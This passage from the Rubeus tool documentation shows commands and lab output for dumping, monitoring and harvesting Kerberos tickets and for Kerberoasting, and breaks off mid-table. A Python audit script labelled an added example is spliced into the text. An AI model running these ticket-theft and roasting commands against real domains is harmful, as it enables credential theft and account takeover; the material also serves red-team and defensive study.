Harvesting\r\nBreakdown of the ticket extraction/harvesting commands:\r\nCommand Description\r\ntriage LUID, username, service 
target, ticket expiration\r\nklist Detailed logon session and ticket info\r\ndump Detailed logon session and ticket data\r\ntgtdeleg Retrieve usable TGT for non-elevated user\r\nmonitor Monitor logon events and dump new tickets\r\nharvest Same as monitor but with auto-renewal functionality\r\nNote: triage/klist/dump give increasing amounts of ticket detail.\r\ntriage\r\nThe triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated\r\ncontext, a table describing all Kerberos tickets on the system is displayed. Tickets can be filtered for a specific\r\nservice with /service:SNAME .\r\nIf elevated, tickets can be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER .\r\nThis can be useful when triaging systems with a lot of Kerberos tickets.\r\nTriage all enumerable tickets (non-elevated):\r\nC:\\Rubeus\u003eRubeus.exe triage\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Triage Kerberos Tickets (Current User)\r\n[*] Current LUID : 0x4420e\r\n-----------------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-----------------------------------------------------------------------------------------\r\n| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x4420e | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |\r\n-----------------------------------------------------------------------------------------\r\nTriage all enumerable tickets 
(elevated):\r\nC:\\Rubeus\u003eRubeus.exe triage\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Triage Kerberos Tickets (All Users)\r\n-------------------------------------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-------------------------------------------------------------------------------------------------------------\r\n| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |\r\n| 0x56cdd86 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:02 PM |\r\n| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |\r\n| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |\r\n| 0x47869cc | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 3:19:11 PM |\r\n| 0x47869b4 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:05:29 PM |\r\n| 0x3c4c241 | dfm.a @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/11/2019 4:24:02 AM |\r\n| 0x441d8 | dfm.a @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/10/2019 11:41:26 PM |\r\n| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local | 2/12/2019 1:25:01 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | 
krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | WINDOWS10$ | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |\r\n-------------------------------------------------------------------------------------------------------------\r\nTriage targeting a specific service (elevated):\r\nC:\\Rubeus\u003eRubeus.exe triage /service:ldap\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Triage Kerberos Tickets (All Users)\r\n[*] Target service : ldap\r\n-----------------------------------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-----------------------------------------------------------------------------------------------------------\r\n| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |\r\n-----------------------------------------------------------------------------------------------------------\r\nklist\r\nThe klist action will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If\r\nrun from an elevated context, information on all logon sessions and associated Kerberos tickets is displayed.\r\nLogon and ticket information can be displayed for a specific LogonID with /luid:0xA.. 
(if elevated).\r\nListing the current (non-elevated) user's logon session and Kerberos ticket information:\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 65 of 100\n\n[*] Action: List Kerberos Tickets (Current User)\r\n[*] Current LUID : 0x4420e\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)\r\n ...(snip)...\r\nElevated listing of another user's logon session/Kerberos ticket information:\r\nC:\\Rubeus\u003eRubeus.exe klist /luid:0x47869b4\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (All Users)\r\n[*] Target LUID : 0x47869b4\r\nUserName : harmj0y\r\nDomain : TESTLAB\r\nLogonId : 0x47869b4\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1111\r\nAuthenticationPackage : Kerberos\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 11:05:31 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : harmj0y@testlab.local\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 66 of 100\n\nFlags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\n ...(snip)...\r\ndump\r\nThe dump action will extract current TGTs and 
service tickets if in an elevated context. If not elevated, service\r\ntickets for the current user are extracted. The resulting extracted tickets can be filtered by /service (use\r\n/service:krbtgt for TGTs) and/or logon ID (the /luid:0xA.. parameter). The KRB-CRED files (.kirbis) are\r\noutput as base64 blobs and can be reused with the ptt function, or Mimikatz's kerberos::ptt functionality.\r\nNote: if run from a non-elevated context, the session keys for TGTs are not returned (by default) from the\r\nassociated APIs, so only the extracted service tickets will be usable. If you want to (somewhat) work around this, use\r\nthe tgtdeleg command.\r\nExtracting the current user's usable service tickets:\r\nC:\\Rubeus\u003eRubeus.exe dump\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Dump Kerberos Ticket Data (Current User)\r\n[*] Current LUID : 0x4420e\r\n[*] Returned 3 tickets\r\nServiceName : krbtgt/TESTLAB.LOCAL\r\nTargetName : krbtgt/TESTLAB.LOCAL\r\nClientName : harmj0y\r\nDomainName : TESTLAB.LOCAL\r\nTargetDomainName : TESTLAB.LOCAL\r\nAltTargetDomainName : TESTLAB.LOCAL\r\nSessionKeyType : rc4_hmac\r\nBase64SessionKey : AAAAAAAAAAAAAAAAAAAAAA==\r\nKeyExpirationTime : 12/31/1600 4:00:00 PM\r\nTicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\nStartTime : 2/11/2019 3:19:15 PM\r\nEndTime : 2/11/2019 8:19:13 PM\r\nRenewUntil : 2/18/2019 3:19:13 PM\r\nTimeSkew : 0\r\nEncodedTicketSize : 1306\r\nBase64EncodedTicket :\r\n doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...\r\n...(snip)...\r\n[*] Enumerated 3 total tickets\r\n[*] Extracted 3 total tickets\r\nElevated extraction of tickets from a specific logon session:\r\nC:\\Rubeus\u003eRubeus.exe dump /luid:0x47869cc\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ 
___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Dump Kerberos Ticket Data (All Users)\r\n[*] Target LUID: 0x47869cc\r\nUserName : harmj0y\r\nDomain : TESTLAB\r\nLogonId : 0x47869cc\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1111\r\nAuthenticationPackage : Negotiate\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 11:05:31 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : harmj0y@testlab.local\r\n[*] Enumerated 3 ticket(s):\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : harmj0y\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : rc4_hmac\r\n Base64SessionKey : u9DOCzuGKAZB6h/E/9XcFg==\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n StartTime : 2/11/2019 3:21:53 PM\r\n EndTime : 2/11/2019 8:19:13 PM\r\n RenewUntil : 2/18/2019 3:19:13 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1306\r\n Base64EncodedTicket :\r\n doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : harmj0y\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : aes256_cts_hmac_sha1\r\n Base64SessionKey : tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\n StartTime : 2/11/2019 3:19:13 PM\r\n EndTime : 2/11/2019 8:19:13 PM\r\n RenewUntil : 2/18/2019 3:19:13 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1338\r\n Base64EncodedTicket :\r\n doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...\r\n ...(snip)...\r\n[*] Enumerated 3 total 
tickets\r\n[*] Extracted 3 total tickets\r\nElevated extraction of all TGTs on a system:\r\nC:\\Rubeus\u003eRubeus.exe dump /service:krbtgt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Dump Kerberos Ticket Data (All Users)\r\n[*] Target service : krbtgt\r\nUserName : harmj0y\r\nDomain : TESTLAB\r\nLogonId : 0x47869cc\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1111\r\nAuthenticationPackage : Negotiate\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 11:05:31 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : harmj0y@testlab.local\r\n [*] Enumerated 3 ticket(s):\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : harmj0y\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : rc4_hmac\r\n Base64SessionKey : y4LL+W3KZoOjnwsiwf150g==\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n StartTime : 2/11/2019 3:23:50 PM\r\n EndTime : 2/11/2019 8:19:13 PM\r\n RenewUntil : 2/18/2019 3:19:13 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1306\r\n Base64EncodedTicket :\r\n doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...\r\n ...(snip)...\r\nUserName : WINDOWS10$\r\nDomain : TESTLAB\r\nLogonId : 0x3e4\r\nUserSID : S-1-5-20\r\nAuthenticationPackage : Negotiate\r\nLogonType : Service\r\nLogonTime : 2/7/2019 4:51:20 PM\r\nLogonServer :\r\nLogonServerDNSDomain : testlab.local\r\nUserPrincipalName : WINDOWS10$@testlab.local\r\n [*] Enumerated 4 ticket(s):\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : WINDOWS10$\r\n DomainName : 
TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : rc4_hmac\r\n Base64SessionKey : 0NgsSyZ/XOCTi9wLR1z9Kg==\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n StartTime : 2/11/2019 3:23:50 PM\r\n EndTime : 2/11/2019 7:23:48 PM\r\n RenewUntil : 2/18/2019 2:23:48 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1304\r\n Base64EncodedTicket :\r\n doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...\r\n ...(snip)...\r\n[*] Enumerated 20 total tickets\r\n[*] Extracted 9 total tickets\r\ntgtdeleg\r\nThe tgtdeleg action uses @gentilkiwi's Kekeo trick (tgt::deleg), which abuses the Kerberos GSS-API to retrieve a usable\r\nTGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a\r\nhandle to the current user's Kerberos security credentials, and InitializeSecurityContext() is then called with the\r\nISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to\r\nsend to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator\r\nchecksum. 
The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the\r\nKRB_CRED in the authenticator, resulting in a usable TGT .kirbi.\r\nIf automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained\r\ndelegation can be specified with /target:SPN.\r\nC:\\Rubeus\u003eRubeus.exe tgtdeleg\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Request Fake Delegation TGT (current user)\r\n[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'\r\n[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'\r\n[+] Kerberos GSS-API initialization success!\r\n[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.\r\n[*] Found the AP-REQ delegation ticket in the GSS-API output.\r\n[*] Authenticator etype: aes256_cts_hmac_sha1\r\n[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=\r\n[+] Successfully decrypted the authenticator\r\n[*] base64(ticket.kirbi):\r\n doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...\r\nmonitor\r\nThe monitor action will periodically extract all TGTs every /monitorinterval:X seconds (default of 60) and\r\ndisplay any newly captured TGTs. 
A /targetuser:USER can be specified, returning only ticket data for said user.\r\nThis function is especially useful on servers with unconstrained delegation enabled ;)\r\nWhen the /targetuser:USER (or if not specified, any user) creates a new 4624 logon event, any extracted TGT\r\nKRB-CRED data is output.\r\nThe /nowrap flag causes the base64 encoded ticket output not to be wrapped per line.\r\nIf you want monitor to run for a specific period of time, use /runfor:SECONDS.\r\nFurther, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to\r\ncreate (e.g., /registry:SOFTWARE\\MONITOR). Then you can remove this entry after you've finished running\r\nRubeus by Get-Item HKLM:\\SOFTWARE\\MONITOR\\ | Remove-Item -Recurse -Force.\r\nc:\\Rubeus\u003eRubeus.exe monitor /targetuser:DC$ /interval:10\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: TGT Monitoring\r\n[*] Target user : DC$\r\n[*] Monitoring every 10 seconds for new TGTs\r\n[*] 12/21/2019 11:10:16 PM UTC - Found new TGT:\r\n User : DC$@THESHIRE.LOCAL\r\n StartTime : 12/21/2019 2:44:31 PM\r\n EndTime : 12/21/2019 3:44:31 PM\r\n RenewTill : 12/28/2019 2:13:06 PM\r\n Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n Base64EncodedTicket :\r\n doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...\r\n[*] Ticket cache size: 1\r\nNote that this action needs to be run from an elevated context!\r\nharvest\r\nThe harvest action takes monitor one step further. It periodically extracts all TGTs every /monitorinterval:X\r\nseconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. 
Every\r\ninterval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal\r\nlimit). Every /displayinterval:X seconds (default of 1200), the current cache of \"usable\"/valid TGT KRB-CRED .kirbis is output as base64 blobs.\r\nThis allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though\r\nelevated rights are needed to extract the tickets.\r\nThe /nowrap flag causes the base64 encoded ticket output not to be wrapped per line.\r\nIf you want harvest to run for a specific period of time, use /runfor:SECONDS.\r\nFurther, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to\r\ncreate (e.g., /registry:SOFTWARE\\MONITOR). Then you can remove this entry after you've finished running\r\nRubeus by Get-Item HKLM:\\SOFTWARE\\MONITOR\\ | Remove-Item -Recurse -Force.\r\nc:\\Rubeus\u003eRubeus.exe harvest /interval:30\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v0.0.1a\r\n[*] Action: TGT Harvesting (w/ auto-renewal)\r\n[*] Monitoring every 30 minutes for 4624 logon events\r\n...(snip)...\r\n[*] Renewing TGT for dfm.a@TESTLAB.LOCAL\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1520 bytes\r\n[*] Received 1549 bytes\r\n[*] 9/17/2018 6:43:02 AM - Current usable TGTs:\r\nUser : dfm.a@TESTLAB.LOCAL\r\nStartTime : 9/17/2018 6:43:02 AM\r\nEndTime : 9/17/2018 11:43:02 AM\r\nRenewTill : 9/24/2018 2:07:48 AM\r\nFlags : name_canonicalize, renewable, forwarded, forwardable\r\nBase64EncodedTicket :\r\n doIFujCCBbagAw...(snip)...\r\nNote that this action needs to be run from an elevated context!\r\nRoasting\r\nBreakdown of the roasting commands:\r\nCommand Description\r\nkerberoast Perform 
Kerberoasting against all (or specified) users\r\nasreproast Perform AS-REP roasting against all (or specified) users\r\nkerberoast\r\nThe kerberoast action replaces the SharpRoast project's functionality. Like SharpRoast, this action uses the\r\nKerberosRequestorSecurityToken.GetRequest() method that was contributed to PowerView by\r\n@machosec in order to request the proper service ticket (for the default behavior; see the opsec table for more detail). Unlike\r\nSharpRoast, this action now performs proper ASN.1 parsing of the result structures.\r\nWith no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their\r\nhighest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the\r\n/user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU.\r\nThe /domain and /dc arguments are optional, pulling system defaults as other actions do.\r\nThe /stats flag will output statistics about the kerberoastable users found, including a breakdown of supported\r\nencryption types and the years in which user passwords were last set. This flag can be combined with other targeting options.\r\nThe /outfile:FILE argument outputs roasted hashes to the specified file, one per line.\r\nIf the /simple flag is specified, roasted hashes will be output to the console, one per line.\r\nIf the /nowrap flag is specified, Kerberoast results will not be line-wrapped.\r\nIf a TGT is supplied with /ticket:X (the base64 encoding of a .kirbi file or the path to a .kirbi file on disk), that TGT\r\nis used to request the service tickets during roasting. 
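The two tables that /stats prints (supported encryption types, and the year each password was last set) can be reproduced from the LDAP attributes Rubeus reads, msDS-SupportedEncryptionTypes and pwdLastSet, without requesting any tickets, which makes the same breakdown a useful audit of which SPN accounts still need AES keys or a password rotation. The following is an added example written for this page, not Rubeus code; the account records are constructed, and the RC4_HMAC_DEFAULT label for an unset attribute is an assumption modelled on the /stats output shown on this page.

```python
"""Added example (not Rubeus code): rebuild the `kerberoast /stats`
tables from msDS-SupportedEncryptionTypes and pwdLastSet so the audit
can be run from a directory export with no ticket requests at all.
The account records below are constructed for illustration."""
from collections import Counter
from datetime import datetime, timedelta, timezone

# Bit values of msDS-SupportedEncryptionTypes (MS-KILE 2.2.7).
ETYPE_BITS = (
    (0x01, "DES_CBC_CRC"),
    (0x02, "DES_CBC_MD5"),
    (0x04, "RC4_HMAC"),
    (0x08, "AES128_CTS_HMAC_SHA1_96"),
    (0x10, "AES256_CTS_HMAC_SHA1_96"),
)

# pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def supported_etypes(value):
    """Label the bitmask the way the /stats table does. An unset or zero
    attribute means the KDC falls back to RC4; this page's output shows
    that case as RC4_HMAC_DEFAULT (assumed naming)."""
    if not value:
        return "RC4_HMAC_DEFAULT"
    names = [name for bit, name in ETYPE_BITS if value & bit]
    return ", ".join(names) if names else "UNKNOWN(0x%x)" % value


def filetime_to_datetime(ticks):
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt):
    # Integer timedelta arithmetic: float seconds lose precision at 1e17 ticks.
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def roast_stats(accounts):
    """Return (etype_counts, year_counts, no_aes) over accounts with an SPN.
    etype_counts and year_counts are the two /stats tables; no_aes lists the
    accounts without AES enabled (the set /rc4opsec enumerates), i.e. the
    first candidates for AES keys, a gMSA, or a long random password."""
    etype_counts, year_counts, no_aes = Counter(), Counter(), []
    for acct in accounts:
        if not acct.get("servicePrincipalName"):
            continue  # no SPN, so not Kerberoastable
        label = supported_etypes(acct.get("msDS-SupportedEncryptionTypes"))
        etype_counts[label] += 1
        year_counts[filetime_to_datetime(acct["pwdLastSet"]).year] += 1
        if "AES" not in label:
            no_aes.append(acct["samAccountName"])
    return etype_counts, year_counts, no_aes


def utc_date(year, month, day):
    return datetime(year, month, day, tzinfo=timezone.utc)


# Constructed sample, modelled on the accounts in this page's examples.
SAMPLE_ACCOUNTS = [
    {"samAccountName": "harmj0y", "servicePrincipalName": ["testspn/server"],
     "msDS-SupportedEncryptionTypes": 0x18,
     "pwdLastSet": datetime_to_filetime(utc_date(2008, 5, 31))},
    {"samAccountName": "constraineduser", "servicePrincipalName": ["blah/blah123"],
     "msDS-SupportedEncryptionTypes": 0x04,
     "pwdLastSet": datetime_to_filetime(utc_date(2009, 9, 5))},
    {"samAccountName": "newuser", "servicePrincipalName": ["blah/blah123456"],
     "msDS-SupportedEncryptionTypes": 0x1C,
     "pwdLastSet": datetime_to_filetime(utc_date(2008, 9, 12))},
    {"samAccountName": "sqlservice", "servicePrincipalName": ["MSSQLSvc/SQL.testlab.local"],
     "msDS-SupportedEncryptionTypes": None,  # attribute never set
     "pwdLastSet": datetime_to_filetime(utc_date(2019, 3, 1))},
    {"samAccountName": "plainuser", "servicePrincipalName": [],  # no SPN, skipped
     "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime_to_filetime(utc_date(2019, 3, 1))},
]

if __name__ == "__main__":
    etypes, years, no_aes = roast_stats(SAMPLE_ACCOUNTS)
    for label, n in etypes.most_common():
        print("%-60s %d" % (label, n))
    for year, n in sorted(years.items()):
        print("%d %d" % (year, n))
    print("Accounts without AES enabled:", ", ".join(no_aes))
```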
If /ticket:X is used with /spn:Y or /spns:Y\r\n(/spns: can be a file containing each SPN on a new line or a comma separated list) then no LDAP searching\r\nhappens for users, so it can be done from a non-domain joined system in conjunction with /dc:Z.\r\nIf the /tgtdeleg flag is supplied, the tgtdeleg trick is used to get a usable TGT for the current user, which is then\r\nused for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.\r\nIf the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are\r\nenumerated and AES service tickets are requested.\r\nIf the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used\r\nto find Kerberoastable users.\r\nIf the /rc4opsec flag is specified, the tgtdeleg trick is used, and accounts without AES enabled are enumerated\r\nand roasted.\r\nIf you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can\r\nbe specified with /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD.\r\nIf the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after\r\nMM-dd-yyyy will be enumerated and roasted.\r\nIf the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before\r\nMM-dd-yyyy will be enumerated and roasted.\r\nIf the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is\r\nlimited to NUMBER.\r\nIf the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests.\r\nThe /jitter:1-100 argument can be combined with it to add a percentage of jitter.\r\nIf the /enterprise flag is used, the SPN is assumed to be an enterprise principal (i.e. user@domain.com). 
This\r\nflag only works when kerberoasting with a TGT.\r\nIf the /autoenterprise flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will\r\nautomatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied, as\r\nRubeus needs to know the target account's samAccountName, which it gets when querying LDAP for the account\r\ninformation.\r\nIf the /ldaps flag is used, any LDAP queries will go over TLS (port 636).\r\nIf the /nopreauth:USER argument is used, either the /spn:Y or /spns:Y argument is required. The\r\n/nopreauth:USER argument will attempt to send AS-REQs with the service being those passed in /spn:Y or\r\n/spns:Y to request service tickets.\r\nkerberoasting opsec\r\nHere is a table comparing the behavior of various flags from an opsec perspective:\r\nArguments Description\r\nnone Use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption\r\n/tgtdeleg Use the tgtdeleg trick to perform TGS-REQ requests of RC4-enabled accounts, roast all accounts w/ RC4 specified\r\n/ticket:X Use the supplied TGT blob/file for 